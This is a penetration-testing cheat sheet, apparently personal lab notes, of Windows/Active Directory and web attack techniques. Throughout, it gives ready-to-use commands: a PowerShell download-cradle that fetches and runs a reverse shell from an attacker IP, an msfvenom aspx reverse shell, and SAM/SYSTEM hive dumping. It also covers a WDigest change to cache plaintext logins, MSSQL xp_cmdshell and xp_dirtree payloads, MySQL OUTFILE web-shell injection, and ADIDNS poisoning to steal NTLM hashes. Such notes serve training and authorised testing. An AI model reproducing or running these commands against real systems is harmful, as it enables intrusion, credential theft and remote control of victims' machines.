# Tricks and Tips

* Lateral Movement techniques - <https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/>
* Sql Injection cheatsheet - <https://www.websec.ca/kb/sql_injection>
* Windows directory file extensions are lowercase
* Windows IIS deualt path is `c:/inetpub/wwwroot/`
* Always use ffuf for fuzzing files and use gobuster for fuzzing directories
* If local privilege escalation exists on windows system for services listening on internal port and exploit is written in python or bash forward that service port and run the exploit in kali.

### In active directory environment if we want to pivot to internal windows host from a compromised windows host check if you can receive reverse connection on attacking host on port 53 since AD is usually configured to allow DNS port 53 to communicate to external hosts. eg:

After creating powershell credential object.

{% code overflow="wrap" %}

```powershell
Invoke-Command -Computer internal.host.local -Credential $cred -ScriptBlock { tcp-one-liner-from-nishang }
```

{% endcode %}

### Identify active hosts on network

* `sudo nmap -sn <address>/24`
* `sudo netdiscover -i <interface>`
* `sudo arp-scan --localnet -I <interface>`

### Enumerating windows version,hostname,domain

```bash
sudo smbmap -H <ip> -v
```

```bash
sudo crackmapexec smb <ip>
```

### Nmap ports scan at faster rate

```bash
sudo masscan -p1-65535 10.10.174.58 --rate 10000 -e tun0
```

### Nmap tcp connect scan

```bash
nmap -sT -p- --min-rate 5000 <host>
```

* After this run nmap on individual found ports

### Nmap udp verbose scan

```bash
nmap -sUV -T4 <ip>
```

### Wordpress verberose scan

```bash
wpscan --url sandbox.local --enumerate ap,at,cb,dbe
```

### To find install locations of programs

```bash
whereis apache2
```

### Find where log files are located in linux hosts(access.log and error.log)

{% code overflow="wrap" %}

```
httpd.conf file in apache tells us where the log files are located so if we donot find log files in default location try getting httpd.conf file 
```

{% endcode %}

### Error clock skew too great

```bash
ntpdate <IP of DC or machine to sync with>
```

### If powershell reverseshell doesn't work convert it to windows base64 and try executing

Since windows does everything in UTF-16 little endian we need to convert our execution code and then base64 it.

{% code overflow="wrap" %}

```bash
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

{% endcode %}

### Adding DNS entry in AD environment for stealing ntlm hashes

There is something in Active Directory called ADIDNS(Active Directory INtegrated Dns) where AD users can configure computer account objects which they control to point to an arbitary IP address. Now this feature can be leveraged if an attacker who has compromised a regular domain user adds DNS A record ( also known as Address record which indicates ip address of a given domain ) to point to address where responder is listening and if someone visits the address or some script is setup by IT team to check if all the web sites in the AD are up abd running as in intelligence box from hackthebox as shown below.

***

{% code overflow="wrap" %}

```
��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves 
Ted.Graves@intelligence.htb
' -To 'Ted Graves 
Ted.Graves@intelligence.htb
' -Subject "Host: $($record.Name) is down" } } catch {} }
```

{% endcode %}

***

Here an attacker who has a regular domain user compromised can add DNS A record pointing to his ip address where responder is listening and since the above script setup by the IT team checks all dns web domains using Invoke-WebRequest their NTLM hash can be stolen. For this we can use ***<https://github.com/Sagar-Jangam/DNSUpdate>***

{% code overflow="wrap" %}

```python
python3 DNSUpdate.py -DNS <DC-IP> -u 'htb.local\<username>' -p <password> -a ad -r webalex -d <attacker-ip>
```

{% endcode %}

### Enabling PS-Remoting

Having an elavated powershell prompt on victim host we can force powershell to work with winrm.

```powershell
Enable-PSRemoting -Force 
Set-Item wsman:\localhost\client\trustedhosts *
```

**Activating winrm remotely**

```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```

**Activating winrm remotely from linux**

{% code overflow="wrap" %}

```python
python3 psexec.py <domain>/<username>:<password>@<DC-ip> 'powershell.exe "Enable-PSRemoting -Force"'
```

{% endcode %}

### Creating powershell credential object

{% code overflow="wrap" %}

```powershell
$username = '<username>'
$password = '<password>'
$secureStringPass = $password | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $secureStringPass
```

{% endcode %}

### Moving laterally to another computer on domain

{% code overflow="wrap" %}

```powershell
Enter-PSSession -ComputerName <computer-name> -Credential <credential created from ps credential object>
```

{% endcode %}

### Windows shell upload via website

If the windows host is running IIS service and we can upload in any location in the web we may be able to upload an aspx reverse shell

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx anything.aspx
```

{% endcode %}

### Decrypt Powershell SecureString password

{% code overflow="wrap" %}

```powershell
$password = '01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e1'

[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR( (ConvertTo-SecureString $password) ))
```

{% endcode %}

* If we need to transfer binary or executable file via ftp we should always use `binary` command first then enter put file.exe

### If mimikatz doesn't work on the host we can save the sam,system and security hive transfer it to our attacking machine via smb and use secretsdump.py to extract all hashes

```batch
reg save hklm\sam c:\windows\temp\sam.save
reg save hklm\security c:\windows\temp\security.save
reg save hklm\system c:\windows\temp\system.save
```

### Windows can execute executable files directly from UNC path

```batch
cmd /c \\192.168.119.233\hello\shell.exe
```

This gets directly executed

### To perform tcp port scan On old linux systems where nmap does not run(May need to run more than once to filter good results)

```bash
nc -w 1 -zv <ip> 1-65535  2>&1 | grep succeeded
```

### To perform udp port scan on old linux where nmap does not work(May need to run more than once to filter good results)

```bash
nc -w 2 -v -u <ip> 1-65535 2>&1 | grep succeeded
```

### Change smb password remotely from linux

```bash
smbpasswd -r 10.10.10.193 -U tlavel
```

### Bypass UAC

fodhelper powershell script can be used to bypass UAC only if our compromised user is member of administrator group

### Powershell Command History file location

```
\AppData\Roaming\Microsoft\Windows\Powershell\
```

### If powershell errors during execution of PrivEsc scripts(eg: Access to the path is denied, operation might require other privileges, etc)

* check if the running reverse shell is 64 bit process if the host is 64 bit and 32 bit process if the shell is 32 bit process

```powershell
[environment]::Is64BitOperatingSystem
```

```powershell
[environment]::Is64BitProcess
```

IF host is 64 bit and our process is 32 bit or vice versa make sure to catch the reverse shell via

&#x20;`C:\WINDOWS\System32\WindowsPowerShell\v1. 0\powershell.exe ...`&#x20;

or upload nc64 to the host and catch the reverse shell or get cmd reverse shell and launch 64 bit powershell from there.

### Hashcat with salt

* In the hash file put the format as hash:salt instead of only the hash.

### MSSQL configuring xp\_cmdshell if not enabled

```sql
';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure 'xp_cmdshell', 1;--
';RECONFIGURE;--
```

### MSSQL Injection xp\_cmdshell RCE

```sql
';EXEC xp_cmdshell 'ping 10.10.14.9';
```

### MSSQL Injection capture credentials when xp\_cmdshell doesnot work

```sql
';EXEC master..xp_dirtree '\\10.10.14.10\share',1,1;--
```

### MySql Injection RCE in windows when smb is running:

{% code overflow="wrap" %}

```sql
'+UNION+SELECT+NULL,NULL,NULL,NULL,load_file('\\\\10.10.14.9\\share\\reverse-shell.php'),NULL--
```

{% endcode %}

### MySql injection php wrapper trick

{% code overflow="wrap" %}

```sql
'+UNION+SELECT+NULL,NULL,NULL,NULL,'data://text/plain,<?php+echo+system("whoami")?>',NULL--
```

{% endcode %}

### MySql Injection OUTFILE RCE:

{% code overflow="wrap" %}

```sql
union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/rev-shell.php'
```

{% endcode %}

### MySql Injection load\_file() read system files

```sql
' UNION SELECT NULL,NULL,NULL,load_file('/etc/passwd');--
```

### Wireshark Group

If our compromised user is in (wireshark) group we can sniff any packets on any available interfaces of the comrpomised host. Below we are sniffing on loopback interface and saving the file as test.pcap

```bash
[alex@websrv01 ~]$ id
uid1002(alex) gid=1002(alex) groups=1002(alex), 994(wireshark)

[alex@websrv01 ~]$ dumpcap -i lo -w test.pcap
```

### Enabling WDigest authentication to force system to store credentials in plaintext so that next time some employee logs in their creds will get cached in memory

* This technique is usually applied to real world red teaming

{% code overflow="wrap" %}

```batch
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
```

{% endcode %}

### Sqlmap force ssl

Use --force-ssl flag in sqlmap if you are attacking web application using https

```bash
sqlmap -u 'https://vulnerable-site.com/index.php?id=1' --force-ssl
```

### Shell as another user on windows host

If we have low privilege access on a windows host and we get credentials or another user or administrator but port 445 is closed externally and we cannot psexec, winrm, rdp or other services are also closed, `Enter-PSSession` or `Invoke-Command -ComputerName` didnot work `RunasCs` or `runas.exe` also did not work there are another two ways

#### First Way

We can create a powershell credential object for that user using their password and use `Start-Process` in powershell with powershell reverse shell to get reverse shell as that user. In compromised host create powershell credential object for that user

{% code overflow="wrap" %}

```powershell
$SecPass = ConvertTo-SecureString 'FoundPassword@123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$SecPass)
```

{% endcode %}

Now convert `Invoke-PowerShellTcpOneLine.ps1` with your ip and port and convert this file to windows base64

{% code overflow="wrap" %}

```bash
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0
```

{% endcode %}

Finally we can start powershell process with our reverse shell in the context of administrator or the found user as&#x20;

{% code overflow="wrap" %}

```powershell
Start-Process -filepath powershell -argumentlist "-enc JABzAG0APQAoAE4AZQ..." -credential $cred
```

{% endcode %}

We will receive reverse shell as the compromised user.

#### Second Way

If port 445, winrm, rdp, or any such port from where we can gain access is listening internally we can forward that port to our local machine and execute `psexec.py`  or `evil-winrm`, or `rdp` to get reverse shell or access as another user.